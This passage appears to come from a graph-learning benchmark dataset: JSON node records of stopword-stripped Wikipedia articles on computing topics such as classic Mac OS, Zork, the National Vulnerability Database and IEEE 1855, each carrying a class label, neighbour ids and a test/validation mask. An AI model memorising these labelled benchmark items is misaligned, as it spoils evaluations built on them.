information configuration environment protection global information current threat level particular region corresponding pertinent threat landscape time events output tice threat evaluations actionable intelligence threat countermeasure recommendations similar lower level counterparts layer2 shm tice evaluates correlates events ascertains correlation events three distinct possibilities 0 ≤ p attack progress compromise occurred ≤ φ1 attack/intrusion φ1 ≤ p attack progress compromise occurred ≤ φ2 insufficient data φ2 ≤ p attack progress compromise occurred attack/ intrusion present values φ1 φ2 tunable 2.1.4 logging presentation services issuance countermeasures lapis lapis represents top layer architecture module actionable intelligence presented administrator action and/or automatic countermeasures issued throughout protected environment simplest implementation fosa architecture latis equivalent security information event management siem module provides visual information security officer/administrator state real time threats detected overall integrity protected environment typical siem capabilities 1 security event management sem 2 file integrity monitoring fim 3 configuration management database cmdb 4 availability performance monitoring apm part layer however unlike typical siem lapis layer provides automatic countermeasure generation repair recovery well manual mode forensics countermeasure issuance based probabilistic model tunable φ1 φ2 parameters",
    "neighbors": [
      939,
      10492,
      3941
    ],
    "mask": "None"
  },
  {
    "node_id": 572,
    "label": 2,
    "text": "Phantom_reference:phantom reference phantom reference kind reference java memory reclaimed phantom reference one strengths levels 'non strong reference defined java programming language others weak soft phantom reference weakest level reference java order strongest weakest strong soft weak phantom object phantomly referenced finalized java 8 earlier versions reference needs cleared memory finalized referent reclaimed change java 9 allow memory finalized referent reclaimable immediately phantom references limited use primarily narrow technical uses first used instead codice_1 method guaranteeing object resurrected finalization allows object garbage collected single cycle rather needing wait second gc cycle ensure resurrected second use detect exactly object removed memory using combination codice_2 object ensuring memory available example deferring allocation large amount memory e.g. large image previous memory freed",
    "neighbors": [
      4358,
      4747,
      910,
      541,
      10526,
      5031,
      5677,
      566,
      6074,
      10683,
      10684,
      5567,
      9665,
      8262,
      6860,
      3920,
      4960,
      2658,
      3560,
      3561,
      3562,
      5872,
      9078,
      3705,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 573,
    "label": 2,
    "text": "IBM_Airline_Control_Program:ibm airline control program ibm airline control program acp discontinued operating system developed ibm beginning 1965 contrast previous airline transaction processing systems notable aspect acp designed run models ibm system/360 mainframe computer family departed earlier model airline different machine-specific transaction system development began sabre semi-automatic business research environment deltamatic panamac programmed airline reservations system pars developed 1969 control program acp separated pars pars keeping functions processing airline reservations related data december 1979 acp became known acp/tpf tpf transaction processing facility transaction operating system became widely implemented businesses major airlines online credit card processing hotel rental car reservations police emergency response systems package delivery systems last free release acp 9.2.1 intended use bank card similar applications shipped mini-reel contained complete acp system libraries restoration ibm 3340 dasd packs complete system one could easily create derivative works hypervisor included allowed os/370 vs1 vs2 svs mvs run guest os acp end-user documentation shipped tape took almost 60 linear inches shelf space see also ibm airline control system alcs variant tpf specially designed provide benefits tpf high speed high volume high availability transaction processing advantages easier integration data center offered running standard ibm operating system platform",
    "neighbors": [
      6529,
      10883,
      4996,
      6148,
      7053,
      8077,
      9361,
      6675,
      9468,
      789,
      5397,
      9619,
      11673,
      9370,
      6557,
      3359,
      10273,
      421,
      7848,
      6442,
      1323,
      4781,
      7983,
      8879,
      7217,
      9139,
      10803,
      6325,
      7477,
      7733,
      10040,
      5562,
      1219,
      964,
      8388,
      6342,
      1235,
      7507,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      6248,
      5492,
      375,
      2168,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 574,
    "label": 7,
    "text": "Comparison_of_software_and_protocols_for_distributed_social_networking:comparison software protocols distributed social networking distributed social network projects generally develop software protocols",
    "neighbors": [
      3462,
      11408,
      9245,
      10154,
      9909,
      4797,
      1087,
      8644,
      78,
      7889,
      6750,
      3428,
      6629,
      10341,
      10727,
      6761,
      9967,
      10991,
      756
    ],
    "mask": "Test"
  },
  {
    "node_id": 575,
    "label": 4,
    "text": "National_Vulnerability_Database:national vulnerability database national vulnerability database nvd u.s. government repository standards-based vulnerability management data represented using security content automation protocol scap data enables automation vulnerability management security measurement compliance nvd includes databases security checklists security related software flaws misconfigurations product names impact metrics nvd supports information security automation program isap friday march 8 2013 database taken offline discovered system used run multiple government sites compromised software vulnerability adobe coldfusion june 2017 threat intel firm recorded future revealed median lag cve2 revealed ultimately published nvd 7 days 75 vulnerabilities published unofficially making nvd giving attackers time exploit vulnerability addition providing list common vulnerabilities exposures cves nvd scores vulnerabilities using common vulnerability scoring system cvss based set equations using metrics access complexity availability remedy",
    "neighbors": [
      3843,
      2446,
      5780,
      2709,
      6423,
      6043,
      678,
      2470,
      5048,
      7739,
      8644,
      3021,
      5078,
      7515,
      4062,
      1140,
      3956,
      635,
      2300
    ],
    "mask": "Test"
  },
  {
    "node_id": 576,
    "label": 2,
    "text": "Classic_Mac_OS:classic mac os classic mac os series operating systems developed macintosh family personal computers apple inc. 1984 2001 starting system 1 ending mac os 9 macintosh operating system credited popularized graphical user interface concept included every macintosh sold era developed many updates system software done conjunction introduction new macintosh systems apple released original macintosh january 24 1984 first version system software official name partially based lisa os apple previously released lisa computer 1983 part agreement allowing xerox buy shares apple favorable price also used concepts xerox parc alto computer former apple ceo steve jobs lisa team members previewed operating system consisted macintosh toolbox rom system folder set files loaded disk name macintosh system software came use 1987 system 5 apple rebranded system mac os 1996 starting officially version 7.6 due part macintosh clone program program ended release mac os 8 1997 last major release system mac os 9 1999 initial versions system software run one application time introduction system 5 cooperative multitasking extension called multifinder added later integrated system 7 part operating system along support virtual memory mid-1990s however contemporary operating systems windows nt os/2 nextstep brought pre-emptive multitasking protected memory access controls multi-user capabilities desktop computers macintosh limited memory management susceptibility conflicts among extensions provide additional functionality networking support particular device led significant criticism operating system factor apple declining market share time two aborted attempts creating successor macintosh system software called taligent copland four-year development effort spearheaded steve jobs return apple 1997 apple replaced mac os new operating system 2001 named mac os x retained user interface design elements classic mac os overlap application frameworks compatibility two operating systems otherwise completely different origins architectures final updates mac os 9 released 2001 provided interoperability mac os x name classic signifies historical mac os whole reference classic environment compatibility layer helped ease transition mac os x titled macos macintosh project started late 1978 jef raskin envisioned easy-to-use low-cost computer average consumer september 1979 raskin began looking engineer could put together prototype bill atkinson member apple lisa team introduced raskin burrell smith service technician hired earlier year apple concept macintosh deliberately sought minimize user awareness operating system many basic tasks required operating system knowledge systems could accomplished mouse gestures graphic controls macintosh would differentiate contemporaries ms-dos use command-line interface consisting terse abbreviated textual commands january 1981 steve jobs completely took macintosh project jobs number apple engineers visited xerox parc december 1979 three months lisa macintosh projects begun hearing pioneering gui technology developed xerox parc former xerox employees like raskin jobs negotiated visit see xerox alto computer smalltalk development tools exchange apple stock options final lisa macintosh operating systems use concepts xerox alto many elements graphical user interface created apple including menu bar pull-down menus concepts drag drop direct manipulation unlike ibm pc uses 8 kb system rom power-on self-test post basic input/output system bios mac rom significantly larger 64 kb holds key os code much original mac rom coded andy hertzfeld member original macintosh team able conserve precious rom space writing routines assembly language code optimized hacks clever programming tricks addition rom also coded kernel macintosh toolbox desktop accessories das icons operating system represent folders application software designed susan kare later designed icons microsoft windows 3.0 bruce horn steve capps wrote macintosh finder well number macintosh system utilities apple aggressively advertised new machine release company bought 39 pages advertisement space 1984 november/december edition newsweek magazine macintosh quickly outsold sophisticated much expensive predecessor lisa apple quickly developed product named macworks allowed lisa emulate macintosh system software system 3 time discontinued rebranded macintosh xl many lisa operating system advances would appear macintosh operating system system 7 later early versions mac os compatible motorola 68000-family macintoshes apple introduced computers powerpc hardware os ported support architecture mac os 8.1 last version could run 68k processor 68040 systems prior powerpc g3-based systems significant parts system stored physical rom motherboard initial purpose avoid using limited storage floppy disks system support given early macs hard disk one model mac ever actually bootable using rom alone 1991 mac classic model architecture also allows completely graphical os interface lowest level without need text-only console command-line mode boot time errors finding functioning disk drives communicated user graphically usually icon distinctive chicago bitmap font chime death series beeps contrast ms-dos cp/m computers time display messages mono-spaced font black background require use keyboard rather mouse input provide niceties low level early mac os depends core system software rom motherboard also ensure apple computers licensed clones copyright-protected roms apple run mac os several computer manufacturers years made macintosh clones capable running mac os 1995 1997 apple licensed macintosh roms several companies notably power computing umax motorola machines normally ran various versions classic mac os steve jobs ended clone-licensing program returning apple 1997 support macintosh clones first exhibited system 7.5.1 first version include mac os logo variation original happy mac startup icon mac os 7.6 first named mac os instead system changes made disassociate operating system apple macintosh models macintosh originally used macintosh file system mfs flat file system one level folders quickly replaced 1985 hierarchical file system hfs true directory tree file systems otherwise compatible improved file system named hfs plus hfs+ mac os extended announced 1997 implemented 1998 files file systems used dos windows unix operating systems one fork contrast mfs hfs give files two different forks data fork contains sort information file file systems text document bitmaps image file resource fork contains structured data menu definitions graphics sounds code segments would incorporated program file format systems executable file might consist resources including code segments empty data fork data file might data fork resource fork word processor file could contain text data fork styling information resource fork application ’ recognize styling information still read raw text hand forks would provide challenge interoperability operating systems copying transferring mac os file non-mac system default implementations would simply strip file resource fork data files contained nonessential information resource fork window size location program files would inoperative without resources necessitated encoding schemes binhex macbinary allowed user encode dual-forked file single stream inversely take single stream so-encoded reconstitute dual-forked file usable mac os part apple goal creating computer appliance-like simplicity explicit distinction made operating system software hardware runs early versions operating system distinct name software consists two user-visible files system file finder application used file management also displays desktop two files contained folder directory labeled system folder contains resource files like printer driver needed interact system version numbers operating system based version numbers two files releases run one application time except desk accessories though special application shells multi-mac switcher discussed multifinder could work around visible changes best reflected version number finder major leaps found 1.x 4.x 5.x 6.x late 1990s apple retroactively gave older releases single name towards end 1987 apple introduced package titled apple macintosh system software update 5.0 first time macintosh operating system offered distinct retail product included four 800k disks three manuals cost 49 usd software still freely available user groups bulletin board services product box presented update operating system version 5.0 number appear software three four disks system tools 1 system tools 2 utilities 1 bootable user boot whichever floppy contain tools user needs instance system tools 2 disk printer drivers utilities 1 disk disk first aid apple hd sc setup disks named system tools users press commonly referred version system tools 5.0 primary new feature system 5 multifinder extension lets system run several programs system uses cooperative multitasking model meaning time given background applications foreground application yields control change system functions applications already calling handle events make many existing applications share time automatically well allowed perform tasks background users also choose use multifinder thereby using single application time 1990 infoworld tested four multitasking options pc mac viewing multifinder positively overall noting presence halved speed file transfer printing compared single-tasking system 6 without multifinder system software 6 also referred system 6 consolidation release macintosh system software producing complete stable long-lasting operating system two major hardware introductions requiring additional support system 6 68030 processor 1.44 mb superdrive debuting macintosh iix macintosh se/30 later updates include support first specialized laptop features introduction macintosh portable system 6 forward finder unified version number closely matching system alleviating much confusion caused often considerable differences earlier systems may 13 1991 system 7 released major upgrade system 6 adding significant user interface overhaul new applications stability improvements many new features introduction coincides release provided support 68040 macintosh line system 7 era saw numerous changes macintosh platform including proliferation macintosh models 68k power macintosh transition well rise microsoft windows increasing use computer networking explosion popularity internet one significant features system 7 virtual memory support essential subsystem anticipated years exists previous systems third party extension named virtual connectix accompanying move 32-bit memory addressing necessary ever-increasing amounts ram available motorola 68030 cpu 68020 cpus 68551 pmmu process involves making routines os code use full 32-bits pointer address—prior systems used upper 8 bits flags change known 32-bit clean system 7 32-bit clean many existing machines thousands applications time process completed ease transition memory control panel contains switch disable feature allowing compatibility older applications another notable system 7 feature built-in cooperative multitasking system software 6 function optional multifinder system 7 also introduced aliases similar symbolic links unix shortcuts introduced later versions microsoft windows shadows ibm os/2 system extensions enhanced moved subfolder subfolder system folder also created control panels system 7.5 apple includes extensions manager previously third-party program simplified process enabling disabling extensions apple menu home desk accessories system 6 made general-purpose user could make often-used folders applications—or anything else desired—appear menu placing aliases apple menu items subfolder system folder system 7 also introduced following applescript scripting language automating tasks 32-bit quickdraw supporting so-called true color imaging previously available system extension truetype outline font standard trash system 6 earlier empties automatically shutting computer—or multifinder running launching application system 7 reimplements trash special hidden folder allowing files remain across reboots user deliberately chose empty trash command system 7.1 mainly bugfix release minor features added one major new features system 7.1 moving fonts system file fonts folder system folder previously resource-copying utility resedit font d/a mover required installing fonts system 7.1 first macintosh operating system cost money previous versions free sold cost floppies also received pro sibling version 7.1.1 extra features system 7.1.2 first version support powerpc-based macs system 7.1 also introduces system enablers method support new models without updating actual system file leads extra files inside system folder one per new model supported system 7.5 introduces large number new features many based shareware applications apple bought included new system newer powerpc machines system 7.5 may stability problems partly due new memory manager turned issues handling errors powerpc code powerpc exceptions map type 11 issues affect 68k-architecture machines system 7.5 contemporary apple failed copland effort well release windows 95 coincides apple purchase several shareware system enhancements include new system features stability improved powerpc-based macs mac os 7.6 dropped system moniker trademarkable name needed order license os growing market third-party macintosh clone manufacturers mac os 7.6 required 32-bit-clean roms dropped support every mac 68000 processor well mac ii mac iix mac iicx mac se/30 mac os 8 released july 26 1997 month steve jobs became de facto ceo apple mainly released keep mac os moving forward difficult time apple initially planned mac os 7.7 renumbered 8 exploit legal loophole accomplish jobs goal terminating third-party manufacturers licenses system 7 shutting macintosh clone market mac os 8 added number features abandoned copland project leaving underlying operating system unchanged multi-threaded finder included files could copied background gui changed appearance new shaded greyscale look named platinum ability change appearance themes also known skins added new control panel though platinum one shipped capability provided new appearance api layer within os one significant changes apple sold 1.2 million copies mac os 8 first two weeks availability 3 million within six months light apple financial difficulties time large grassroots movement among mac users upgrade help save apple even pirate groups refused redistribute os mac os 8.1 introduced updated version hierarchical file system named hfs+ fixed many limitations earlier system continued used macos macos high sierra replaced apple file system interface changes separating network features printing improvements application switching however underlying technical respects mac os 8 different system 7 mac os 8.5 focuses speed stability 68k code replaced modern code native powerpc also improved appearance user interface although theming feature cut late development mac os 9 last major revision classic mac os released october 23 1999 generally steady evolution mac os 8 early development releases mac os 9 numbered 8.7 mac os 9 added improved support airport wireless networking introduced early implementation multi-user support though true multi-user operating system mac os 9 allow multiple desktop users data system settings improved sherlock search engine added several new search plug-ins mac os 9 also provides much improved memory implementation management applescript improved allow tcp/ip networking control mac os 9 also makes first use centralized apple software update find install os hardware updates new features included on-the-fly file encryption software code signing keychain technologies remote networking file server packages much improved list usb drivers mac os 9 also added transitional technologies help application developers adopt mac os x features introduction new os public help ease transition included new apis file system bundling carbon library apps could link instead traditional api libraries—apps adapted could run natively mac os x well changes made beginning mac os 9.1 update allow launched classic environment within mac os x final update classic mac os version 9.2.2 released december 5 2001. macos originally named mac os x 2012 os x 2016 apple current mac operating system officially succeeded classic mac os 2001 although originally marketed simply version 10 mac os history largely independent earlier mac os releases macos architectural legacy successor mac os 9 classic mac os legacy however unlike classic mac os unix-based operating system built nextstep technology developed next late 1980s early 1997 apple purchased company ceo steve jobs returned apple macos also makes use bsd codebase xnu kernel core set components based upon apple open source darwin operating system early version operating system mac os x server 1.0 released 1999 retains platinum appearance classic mac os even resembles openstep places desktop version mac os x 10.0 followed march 24 2001 supporting new aqua user interface since several versions operating system released mac os x renamed os x 2012 macos 2016 users classic mac os generally upgraded mac os x criticized early years difficult less user-friendly original mac os lack certain features yet reimplemented new os slower hardware especially older hardware incompatibilities older os drivers printers scanners tablets etc written older mac os compatible mac os x due lack mac os x support older apple computers macintosh users continued using older classic mac os years original release mac os x. steve jobs encouraged people upgrade mac os x staging mock funeral mac os 9 wwdc 2002 powerpc versions mac os x including mac os x 10.4 tiger include compatibility layer running older mac applications classic environment originally codenamed blue box environment runs nearly complete mac os 9 operating system version 9.1 later mac os x application allows applications ported carbon api run mac os x reasonably seamless though classic applications retain original mac os 9 appearance gain mac os x aqua appearance early new world rom powerpc-based macs shipped mac os 9.2 well mac os x. mac os 9.2 installed user—it installed default hardware revisions released mac os x 10.4 well-written classic mac os applications function properly environment compatibility assured software written unaware actual hardware interact solely operating system classic environment available intel-based mac systems due incompatibility mac os 9 x86 hardware third-party macintosh emulators vmac basilisk ii executor eventually made possible run classic mac os intel-based pcs emulators restricted emulating 68k series processors could n't run versions mac os succeeded 8.1 required powerpc processors also required mac rom image hardware interface supporting real mac rom chip requiring image dubious legal standing rom image may infringe apple intellectual property notable exception executor commercial software product abacus research development product used 100 reverse-engineered code without use apple technology ran extremely quickly never achieved minor subset functionality programs completely compatible many extremely crash-prone ran executor filled niche market porting 68k mac applications x86 platforms development ceased 2002 source code released author late 2008 emulators using mac rom images offered near complete mac os compatibility later versions offered excellent performance modern x86 processor performance increased exponentially apple included mac 68k emulator ran seamlessly powerpc-based versions classic mac os comparison 68k-emulator development powerpc support difficult justify due anticipated wide performance overhead emulated powerpc architecture would later prove correct pearpc project despite availability 7th 8th generation x86 processors employing similar architecture paradigms present powerpc nevertheless pearpc emulator capable emulating powerpc processors required newer versions mac os however longer maintained like many emulators tends run much slower native operating system would another powerpc emulator sheepshaver around since 1998 beos powerpc platform 2002 open sourced efforts began port platforms originally designed use x86 platforms required actual powerpc processor present machine running similar hypervisor although provides powerpc processor support run mac os 9.0.4 emulate memory management unit examples include shapeshifter developer created sheepshaver fusion ifusion latter ran classic mac os powerpc coprocessor accelerator card using method said equal better speed macintosh processor especially respect 68k series due real macs running mmu trap mode hampering performance apple rosetta powerpc emulator intel-based macs support classic mac os",
    "neighbors": [
      2058,
      6155,
      4111,
      4112,
      10257,
      4114,
      25,
      4122,
      6180,
      6186,
      8253,
      6221,
      4180,
      4184,
      6234,
      2141,
      10333,
      97,
      8296,
      8298,
      8303,
      8304,
      10352,
      6258,
      2168,
      6264,
      2179,
      137,
      10382,
      6296,
      2201,
      4251,
      2207,
      10406,
      171,
      178,
      2232,
      6329,
      4283,
      8388,
      2248,
      8404,
      213,
      2262,
      2266,
      8410,
      4318,
      6371,
      231,
      6377,
      2282,
      10476,
      237,
      4333,
      10478,
      2288,
      242,
      4345,
      8441,
      10499,
      10501,
      2319,
      273,
      10516,
      8480,
      292,
      2345,
      4399,
      2355,
      4409,
      8505,
      2363,
      6459,
      2365,
      2366,
      10562,
      4423,
      8524,
      2388,
      2389,
      2395,
      8540,
      10590,
      6495,
      8544,
      8551,
      10602,
      8557,
      6510,
      10608,
      2417,
      376,
      8573,
      4486,
      8582,
      394,
      6539,
      4492,
      2462,
      10654,
      421,
      4521,
      8618,
      4525,
      2478,
      8627,
      10676,
      2492,
      446,
      10691,
      2502,
      4550,
      456,
      464,
      6608,
      8662,
      8665,
      477,
      10730,
      10731,
      8687,
      499,
      2551,
      2553,
      8700,
      6654,
      2560,
      6657,
      514,
      10755,
      4615,
      2571,
      6675,
      8725,
      10776,
      4637,
      4643,
      2598,
      2603,
      6700,
      8754,
      10803,
      10808,
      10809,
      8767,
      576,
      2625,
      8771,
      8774,
      8783,
      10838,
      10841,
      4702,
      8806,
      6760,
      10856,
      2676,
      4724,
      4727,
      10872,
      634,
      2686,
      6783,
      10878,
      2691,
      10883,
      4741,
      10888,
      8842,
      10891,
      6797,
      6807,
      670,
      6829,
      2735,
      8879,
      6837,
      8889,
      8893,
      6849,
      4807,
      713,
      4810,
      722,
      4822,
      10970,
      10975,
      4844,
      8943,
      2811,
      2819,
      11011,
      784,
      8976,
      8977,
      787,
      789,
      2839,
      4888,
      11037,
      811,
      4910,
      6966,
      823,
      9022,
      11075,
      4933,
      838,
      9035,
      6988,
      9063,
      7020,
      2933,
      7036,
      9084,
      7039,
      2948,
      7057,
      5022,
      2979,
      7076,
      9123,
      11171,
      935,
      9128,
      11173,
      11184,
      7095,
      3007,
      9151,
      5058,
      11204,
      11205,
      7118,
      9166,
      5072,
      9174,
      7133,
      9182,
      11229,
      7139,
      5093,
      1007,
      5105,
      7154,
      11251,
      11257,
      7163,
      5115,
      1042,
      7187,
      11289,
      9245,
      3109,
      5158,
      7211,
      7217,
      1074,
      3160,
      9308,
      3167,
      11363,
      7269,
      7285,
      7286,
      9335,
      1147,
      7292,
      3197,
      1150,
      5247,
      11390,
      7299,
      7305,
      11402,
      7307,
      9366,
      1177,
      9370,
      3228,
      7325,
      11430,
      3241,
      5292,
      5293,
      9388,
      3248,
      5299,
      3255,
      9406,
      9418,
      7378,
      3286,
      7382,
      9430,
      9436,
      3293,
      1247,
      11489,
      1253,
      7403,
      9451,
      11503,
      5363,
      11513,
      9466,
      3324,
      9468,
      1278,
      7422,
      11521,
      1290,
      9491,
      11539,
      5397,
      5413,
      3368,
      3371,
      7470,
      7477,
      7483,
      11581,
      11584,
      1346,
      1347,
      1348,
      5452,
      11598,
      5457,
      11601,
      7507,
      7511,
      3426,
      9579,
      5484,
      1389,
      11629,
      11635,
      5492,
      7544,
      5500,
      11649,
      7554,
      7561,
      3469,
      5520,
      11667,
      1428,
      3483,
      11675,
      1439,
      1445,
      3498,
      9643,
      7601,
      7614,
      5569,
      1482,
      7629,
      9700,
      1509,
      9703,
      1515,
      5616,
      3571,
      5619,
      9732,
      1542,
      1549,
      3598,
      7697,
      9756,
      5663,
      9762,
      9778,
      9780,
      1592,
      3641,
      9784,
      5694,
      5696,
      5713,
      3670,
      1623,
      3681,
      9826,
      5733,
      3691,
      9835,
      5743,
      9840,
      9848,
      5754,
      7806,
      1666,
      3719,
      7830,
      5784,
      9880,
      9882,
      9887,
      7842,
      7849,
      1710,
      3758,
      9907,
      7869,
      5823,
      7872,
      1736,
      5833,
      9932,
      3790,
      5840,
      5864,
      7912,
      1772,
      7928,
      9986,
      1796,
      7943,
      1804,
      9999,
      10016,
      3879,
      10023,
      7983,
      7986,
      1844,
      7991,
      3901,
      7999,
      10052,
      5969,
      5976,
      10088,
      3948,
      3963,
      8063,
      10113,
      8069,
      3974,
      6022,
      6023,
      3978,
      8082,
      10130,
      8092,
      6048,
      8102,
      10153,
      8109,
      8114,
      6075,
      6078,
      10174,
      4040,
      8136,
      8148,
      4068,
      2023,
      8170,
      10221,
      6126,
      6128,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 577,
    "label": 3,
    "text": "Zork:zork zork one earliest interactive fiction computer games roots drawn original genre game colossal cave adventure first version zork written 1977 1979 using mdl programming language dec pdp-10 computer authors—tim anderson marc blank bruce daniels dave lebling—were members mit dynamic modelling group zork published commercially split three games zork great underground empire – part later known zork zork ii wizard frobozz zork iii dungeon master zork distinguished genre especially rich game terms quality storytelling sophistication text parser limited simple verb-noun commands hit troll recognized prepositions conjunctions hit troll elvish sword zork set ruins ancient empire lying far underground player nameless adventurer venturing dangerous land search wealth adventure goal return exploring great underground empire gue short alive treasures needed complete adventure ultimately inheriting title dungeon master dungeons stocked many novel creatures objects locations among ferocious light-fearing grues zorkmids gue currency flood control dam 3—all referenced subsequent infocom text adventures frobozzco international fictional monopolistic conglomerate game frobozzco products littered throughout zork games often humorous effect several treasures locations zork suggest used large aristocratic family called flatheads reigned supreme gue instruction manual zork trilogy tells reader twelve rulers family referencing book lives twelve flatheads flatheads named historical figures example zork ii one treasure portrait j. pierpont flathead game several light sources player pick use among battery-powered brass lantern pair candles limited lifespan well torch never expires player must carrying least one light source times exploring dark areas games else continues navigating dark player caught devoured carnivorous grue ending adventure defeat exception rule occurs player must use spray grue repellent navigate dark areas requiring empty inventory order traverse original mit version zork also called dungeon combines plot elements three following games made available commercial sale game takes place zork calendar year 948 gue although passage time notable gameplay player steps deliberately vague role adventurer game begins near white house small self-contained area although player given little instruction house provides obvious point interest player begins barrow zork armed trusty brass lantern elvish sword great antiquity objective game initially clear player pursued throughout titular wizard player begins bottom endless stair zork ii zork iii somewhat less straightforward treasure hunt previous installments instead player—in role adventurer played zork zork ii —must demonstrate worthiness assume role dungeon master steve meretzky said 1984 worst bug ever got zork iii sword last puzzle makes game unwinnable call things like 'fatal errors caught one relatively early said zork games player limited verb-noun commands take lamp open mailbox forth instead parser supports sophisticated sentences put lamp sword case look rug drop except lantern game understands many common verbs including take drop examine attack climb open close count many games also support commands game directly rather taking actions within fictional setting game save restore script unscript begin end text transcript game text restart quit could modify amount information displayed screen room subsequent return room commands brief superbrief verbose brief would give moderate room item description initial visit bare minimum subsequent visits superbrief would give room title every visit verbose would supply maximum verbosity giving available information room item thereof revisit thereafter first adventure game colossal cave adventure written crowther fortran dec pdp-10 bbn 1975 colossal cave basic treasure hunt takes place analog mammoth cave game uses simple two-word parser later adventure games imitated pdp users quickly spread colossal cave around community including stanford university computer used woods 1976 woods contacted crowther received permission make improved version also spread many locations including pdp-10 systems mit dave lebling member dynamic modelling group dm mit laboratory computer science recalled colossal cave reached mit couple weeks dozens people playing game feeding clues ... everyone asking hallway gotten past snake yet spring 1977 wanting play games—and believing could improve colossal cave —lebling marc blank tim anderson decided write one mdl referred muddle pdp-10 running operating system muddle lisp-based system provided powerful string manipulation two games similar using text commands input exploration zork much advanced technically allowing longer specific commands zork also uses completely new map designed multiple areas stories self-contained puzzles whereas cave purely exploratory colossal cave referred simulation mammoth cave zork described simulation colossal cave much sophisticated boston globe 1984 stated zork bore relationship adventure splashiest arcade games little white light bounced primitive pong summer 1977 dm group game runnable although one-half final 1 mb size team members referring imps implementers continued add new sections map game initially ran port muddle tenex available imps adapted run tops-20 granted account machine running version became widely available arpanet mailing list dedicated game appeared fall final sections added along -inspired combat system game essentially complete imps continued working game next year adding areas puzzles major development completed fall 1978 last addition made february 1979 development continued bug fixes touchups last mainframe release january 1981 word zork nonsense word often used mit hackers name unfinished program ready installed system game complete 1978 imps renamed game dungeon time popular among gamers year developers received notice tactical studies rules tsr publishers dungeons dragons claimed game violated copyrights changed name back zork developed dm game source code protected encrypting files patching machine copy allow access directory containing source code mit hacker repatched os allow access directory copied source directory tops-20 machine used brute-force attack decrypt files bob supnik digital equipment corporation used decrypted source create fortran iv port allowed game run smaller pdp-11 supnik released version january 1978 ported many platforms source versions taken era original game still known dungeon fortran version dungeon widely available dec vaxes one popular items distributed decus incorporated features changes original muddle version late 1980s fortran version extensively rewritten vax fortran became fully compatible last mdl release one extra joke impassable entrance mill reference dec maynard massachusetts headquarters also gdt command game debugging technique reference ddt debugger enables player move object including player room use gdt requires answering random question requiring deep knowledge game game response wrong answer booming voice says 'wrong cretin notice turned pile dust appears many fortune cookie databases fortran version also included distribution media data general operating systems used acceptance test verify os correctly installed able compile link run program demonstrated run-time libraries compiler link editor installed correct locations fortran version running ibm 370 port constituyentes atomic center argentina around 1984 1979 three four original imps founded infocom general programming firm two members dm team berez marc blank convinced founders possible sell zork commercially new personal computers systems however support mdl usually fortran compiler used floppy disk systems storing 180 kb even using cassette tapes storage berez blank came idea creating new computer programming language zork implementation language zil would run within virtual machine known z-machine z-machine would ported various platforms shells known z-machine interpreter program zip using rented time tops-20 machine built first zip 1979 solve problem storage space first considered using data compression decided remove sections game would fit floppy disk dave lebling drew circle zork map contained half original map 100 locations including everything ground large section surrounding round room map modified make logical seal exits led longer-existing areas berez became president infocom new game running tops-20 zip new pdp-11 version z-machine end 1979 scott cutler created trs-80 version zip early 1980 february company demonstrated zork personal software ps distributors visicalc likely first software distribution firm microcomputers june ps agreed distribute game june ps interest pdp-11 version infocom retained distribution rights became first official sale company november 1980 shipped copy 8-inch floppy along hand-copied version manual sales trs-80 version ps began next month selling 1,500 copies next nine months bruce daniels apple ii version began sales february 1981 ps sold 6,000 copies september zork began shipping lebling began converting remaining half map zil divided two parts modified original released zork ii zork iii zork similar first half original game sequels different second half example ii player return white house zork ii offered ps april licensed june 1981 infocom worried ps commitment game although company know sales visicalc strong ps began discontinuing software become visicorp infocom took distribution october releasing renamed zork zork ii november 1981 1982 company completed port zork iii wrote new zips commodore 64 atari 8-bit family cp/m systems ibm pc zork iii shipped platforms fall 1982 zork became commercial product infocom infocom agreed infocom copyright notice put fortran version noncommercial distribution would allowed c translations thereof included several linux distributions zork series successful infocom sold 250,000 copies first three games 1984 680,000 copies 1986 one third infocom total game sales 1996 next generation listed text adventure installments series collectively number 38 top 100 games time praising ai puzzles humor writing argued text adventures general zork particular offer greater variety puzzles explorable areas better plot development graphic adventures emphasis original zork sales surprised infocom rising falling time many dealers sold game essential accessory purchasing new computers best-selling game 1982 32,000 copies sold first half year almost 100,000 copies 1983 150,000 copies 1984 comprising 20 infocom sales year total 378,987 copies 1986 popular hint book printed invisible ink guide players world without spoilers. ref name=digitalschism",
    "neighbors": [
      7556,
      5260,
      3216,
      273,
      11666,
      8474,
      11680,
      9006,
      7983,
      10547,
      1335,
      4409,
      6090,
      7116,
      9166,
      11604,
      6502,
      7019,
      7023,
      1265,
      625,
      627,
      3443,
      3960,
      1147,
      2045,
      11390
    ],
    "mask": "None"
  },
  {
    "node_id": 578,
    "label": 9,
    "text": "IEEE_1855:ieee 1855 ieee standard 1855-2016 ieee standard fuzzy markup language fml technical standard developed ieee standards association fml allows modelling fuzzy logic system human-readable hardware independent way fml based extensible markup language xml designers fuzzy systems fml unified high-level methodology describing interoperable fuzzy systems ieee standard 1855-2016 uses w3c xml schema definition language define syntax semantics fml programs prior introduction fml fuzzy logic practitioners could exchange information fuzzy algorithms adding software functions ability read correctly parse store results work form compatible fuzzy control language fcl described specified part 7 iec 61131 fml lets people code fuzzy systems collection correlated semantic tags model components classical fuzzy controller—such knowledge base rule base fuzzy variables fuzzy rules therefore fml tags used build fuzzy controller represent set lexemes used create fuzzy expressions design well-formed xml-based language xml schema describes fml context-free grammar defines name type attributes characterized xml element however since fml program represents static view fuzzy logic controller so-called extensible stylesheet language translator xslt changes static view computable version indeed xslts modules convert fml-based fuzzy controller general purpose computer language using xsl file containing translation description level control executable hardware short fml essentially composed three layers ieee 1855 first standard sponsored ieee computational intelligence society",
    "neighbors": [
      7707,
      502,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 579,
    "label": 7,
